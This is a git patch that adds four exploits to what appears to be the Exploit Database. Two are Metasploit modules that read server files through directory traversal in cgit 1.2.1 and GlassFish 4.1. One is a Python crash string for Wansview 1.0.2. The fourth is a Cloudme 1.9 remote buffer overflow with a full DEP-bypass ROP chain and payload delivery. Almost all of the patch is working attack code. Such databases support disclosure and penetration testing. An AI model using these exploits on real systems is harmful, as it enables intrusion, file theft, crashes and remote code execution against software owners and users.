From e0f6cc4569a0fdc307b80fa88f2425ddd8f2438a Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 15 Aug 2018 05:01:45 +0000 Subject: [PATCH] DB: 2018-08-15 4 changes to exploits/shellcodes Wansview 1.0.2 - Denial of Service (PoC) Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit) cgit 1.2.1 - Directory Traversal (Metasploit) Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit) --- exploits/linux/webapps/45195.rb | 78 +++++++++++++++++++++ exploits/windows/webapps/45196.rb | 66 ++++++++++++++++++ exploits/windows_x86-64/local/45194.py | 25 +++++++ exploits/windows_x86-64/remote/45197.rb | 92 +++++++++++++++++++++++++ files_exploits.csv | 4 ++ 5 files changed, 265 insertions(+) create mode 100755 exploits/linux/webapps/45195.rb create mode 100755 exploits/windows/webapps/45196.rb create mode 100755 exploits/windows_x86-64/local/45194.py create mode 100755 exploits/windows_x86-64/remote/45197.rb diff --git a/exploits/linux/webapps/45195.rb b/exploits/linux/webapps/45195.rb new file mode 100755 index 000000000..95b66b248 --- /dev/null +++ b/exploits/linux/webapps/45195.rb @@ -0,0 +1,78 @@ +# Title: cgit 1.2.1 - Directory Traversal (Metasploit) +# Author: Dhiraj Mishra +# Software: cgit +# Link: https://git.zx2c4.com/cgit/ +# Date: 2018-08-14 +# CVE: CVE-2018-14912 +# This module exploits a directory traversal vulnerability which exists +# in cgit < 1.2.1 cgit_clone_objects(), reachable when the configuration +# flag enable-http-clone is set to 1 (default). + +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'cgit Directory Traversal', + 'Description' => %q{ + This module exploits a directory traversal vulnerability which + exists in cgit < 1.2.1 cgit_clone_objects(), reachable when the + configuration flag enable-http-clone is set to 1 (default). + }, + 'References' => + [ + ['CVE', '2018-14912'], + ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1627'], + ['EDB', '45148'] + ], + 'Author' => + [ + 'Google Project Zero', # Vulnerability discovery + 'Dhiraj Mishra' # Metasploit module + ], + 'DisclosureDate' => 'Aug 03 2018', + 'License' => MSF_LICENSE + )) + + register_options( + [ + OptString.new('FILEPATH', [true, "The path to the file to read", '/etc/passwd']), + OptString.new('TARGETURI', [true, "The base URI path of the cgit install", '/cgit/']), + OptString.new('REPO', [true, "Git repository on the remote server", '']), + OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 10 ]) + ]) + end + + def run_host(ip) + filename = datastore['FILEPATH'] + traversal = "../" * datastore['DEPTH'] << filename + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, datastore['REPO'], '/objects/'), + 'vars_get' => {'path' => traversal} + }) + + unless res && res.code == 200 + print_error('Nothing was downloaded') + return + end + + vprint_good("#{peer} - \n#{res.body}") + path = store_loot( + 'cgit.traversal', + 'text/plain', + ip, + res.body, + filename + ) + print_good("File saved in: #{path}") + end +end \ No newline at end of file diff --git a/exploits/windows/webapps/45196.rb b/exploits/windows/webapps/45196.rb new file mode 100755 index 000000000..8e0f9afcb --- /dev/null +++ b/exploits/windows/webapps/45196.rb @@ -0,0 +1,66 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Path Traversal in Oracle GlassFish Server Open Source Edition', + 'Description' => %q{ + This module exploits an unauthenticated directory traversal vulnerability + which exits in administration console of Oracle GlassFish Server 4.1, which is + listening by default on port 4848/TCP. + }, + 'References' => + [ + ['CVE', '2017-1000028'], + ['URL', 'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904'], + ['EDB', '39441'] + ], + 'Author' => + [ + 'Trustwave SpiderLabs', # Vulnerability discovery + 'Dhiraj Mishra' # Metasploit module + ], + 'DisclosureDate' => 'Aug 08 2015', + 'License' => MSF_LICENSE + )) + + register_options( + [ + Opt::RPORT(4848), + OptString.new('FILEPATH', [true, "The path to the file to read", '/windows/win.ini']), + OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ]) + ]) + end + + def run_host(ip) + filename = datastore['FILEPATH'] + traversal = "%c0%af.." * datastore['DEPTH'] << filename + + res = send_request_raw({ + 'method' => 'GET', + 'uri' => "/theme/META-INF/prototype#{traversal}" + }) + + unless res && res.code == 200 + print_error('Nothing was downloaded') + return + end + + vprint_good("#{peer} - #{res.body}") + path = store_loot( + 'oracle.traversal', + 'text/plain', + ip, + res.body, + filename + ) + print_good("File saved in: #{path}") + end +end \ No newline at end of file diff --git a/exploits/windows_x86-64/local/45194.py b/exploits/windows_x86-64/local/45194.py new file mode 100755 index 000000000..2f03ea61c --- /dev/null +++ b/exploits/windows_x86-64/local/45194.py @@ -0,0 +1,25 @@ +# Exploit Title: Wansview 1.0.2 - Denial of Service (PoC) +# Author: Gionathan "John" Reale +# Discovey Date: 2018-08-14 +# Software Link: http://www.wansview.com/uploads/soft/Wansview_v1.0.2.exe +# Tested Version: 1.0.2 +# Tested on OS: Windows 10 +# Steps to Reproduce: Run the python exploit script, it will create a new +# file with the name "exploit.txt" just copy the text inside "exploit.txt" +# and start the Wansview program. Now click "Add Camera" and in the new +# window paste the content of "exploit.txt" into the following fields: +# "Camera name" & "DID number". Click "Add" and you will see a crash. + +#!/usr/bin/python + +buffer = "A" * 2000 + +payload = buffer +try: + f=open("exploit.txt","w") + print "[+] Creating %s bytes evil payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows_x86-64/remote/45197.rb b/exploits/windows_x86-64/remote/45197.rb new file mode 100755 index 000000000..b0fecd665 --- /dev/null +++ b/exploits/windows_x86-64/remote/45197.rb @@ -0,0 +1,92 @@ +# Exploit Title: Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit) +# Date: 2018-08-13 +# Exploit Author: Raymond Wellnitz +# Vendor Homepage: https://www.cloudme.com +# Version: 1.8.x/1.9.x +# Tested on: Windows 7 x64 +# CVE : 2018-6892 + +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Cloudme v1.8.x/v1.9.x Buffer Overflow with DEP-Bypass', + 'Description' => %q{ + This module exploits a stack buffer overflow in Cloudme v1.8.x/v1.9.x. + }, + 'Author' => [ 'Raymond Wellnitz' ], + 'References' => + [ + [ 'CVE', 'CVE-2018-6892' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Platform' => 'win', + 'Privileged' => true, + 'Payload' => + { + 'Space' => 600, + 'BadChars' => "\x00" + }, + 'Targets' => + [ + [ 'Windows x86_32/64', { 'Ret' => 0x6cfa88a2 } ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => '11.02.2018')) + + register_options([ Opt::RPORT(8888) ]) + end + +def create_rop_chain() + rop_gadgets = [ + 0x6cf98182, # POP EAX # RETN [icuin49.dll] + 0x68c848d8, # ptr to &VirtualProtect() [IAT Qt5Core.dll] + 0x61b4d226, # MOV EAX,DWORD PTR DS:[EAX] # RETN [Qt5Gui.dll] + 0x668d8261, # XCHG EAX,ESI # RETN [libGLESv2.dll] + 0x68a5c297, # POP EBP # RETN [Qt5Core.dll] + 0x688dd45d, # & JMP ESP [Qt5Core.dll] + 0x68abe868, # POP EAX # RETN [Qt5Core.dll] + 0xfffffdff, # 201 + 0x1004b263, # NEG EAX # RETN [LIBEAY32.dll] + 0x689687d2, # XCHG EAX,EBX # RETN + 0x68abe868, # POP EAX # RETN [Qt5Core.dll] + 0xffffffc0, # 40 + 0x1004b263, # NEG EAX # RETN [LIBEAY32.dll] + 0x6751d479, # XCHG EAX,EDX # RETN [icuuc49.dll] + 0x100010c7, # POP ECX # RETN [LIBEAY32.dll] + 0x6494ea0a, # &Writable location [libwinpthread-1.dll] + 0x68a49534, # POP EDI # RETN [Qt5Core.dll] + 0x1008df82, # RETN (ROP NOP) [LIBEAY32.dll] + 0x68ad025b, # POP EAX # RETN [Qt5Core.dll] + 0x90909090, # NOPS + 0x6759bdb4, # PUSHAD # RETN [icuuc49.dll] + ].flatten.pack("V*") + return rop_gadgets +end + + def exploit + connect + + sploit = rand_text_alpha_upper(1036) + sploit << create_rop_chain() + sploit << make_nops(30) + sploit << payload.encoded + + print_status("Trying target #{target.name}...") + sock.put(sploit + "\r\n\r\n") + + handler + disconnect + end +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 8f3aebe11..43cebfc4d 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -9871,6 +9871,7 @@ id,file,description,date,author,type,platform,port 45181,exploits/windows_x86/local/45181.py,"Monitoring software iSmartViewPro 1.5 - 'SavePath for ScreenShots' Buffer Overflow",2018-08-13,"Shubham Singh",local,windows_x86, 45184,exploits/linux/local/45184.sh,"PostgreSQL 9.4-0.5.3 - Privilege Escalation",2018-08-13,"Johannes Segitz",local,linux, 45192,exploits/android/local/45192.txt,"Android - Directory Traversal over USB via Injection in blkid Output",2018-08-13,"Google Security Research",local,android, +45194,exploits/windows_x86-64/local/45194.py,"Wansview 1.0.2 - Denial of Service (PoC)",2018-08-14,"Gionathan Reale",local,windows_x86-64, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -16686,6 +16687,7 @@ id,file,description,date,author,type,platform,port 45180,exploits/windows/remote/45180.txt,"Microsoft DirectX SDK - 'Xact.exe' Remote Code Execution",2018-08-13,hyp3rlinx,remote,windows, 45170,exploits/windows/remote/45170.py,"Mikrotik WinBox 6.42 - Credential Disclosure (Metasploit)",2018-08-09,"Omid Shojaei",remote,windows, 45193,exploits/windows/remote/45193.rb,"Oracle Weblogic Server - Deserialization Remote Code Execution (Metasploit)",2018-08-13,Metasploit,remote,windows,7001 +45197,exploits/windows_x86-64/remote/45197.rb,"Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)",2018-08-14,"Raymond Wellnitz",remote,windows_x86-64, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -39793,3 +39795,5 @@ id,file,description,date,author,type,platform,port 45177,exploits/php/webapps/45177.txt,"Zimbra 8.6.0_GA_1153 - Cross-Site Scripting",2018-08-10,"Dino Barlattani",webapps,php, 45179,exploits/php/webapps/45179.txt,"MyBB Like Plugin 3.0.0 - Cross-Site Scripting",2018-08-10,0xB9,webapps,php, 45190,exploits/multiple/webapps/45190.txt,"IBM Sterling B2B Integrator 5.2.0.1/5.2.6.3 - Cross-Site Scripting",2018-08-13,"Vikas Khanna",webapps,multiple, +45195,exploits/linux/webapps/45195.rb,"cgit 1.2.1 - Directory Traversal (Metasploit)",2018-08-14,"Dhiraj Mishra",webapps,linux, +45196,exploits/windows/webapps/45196.rb,"Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit)",2018-08-14,Metasploit,webapps,windows,4848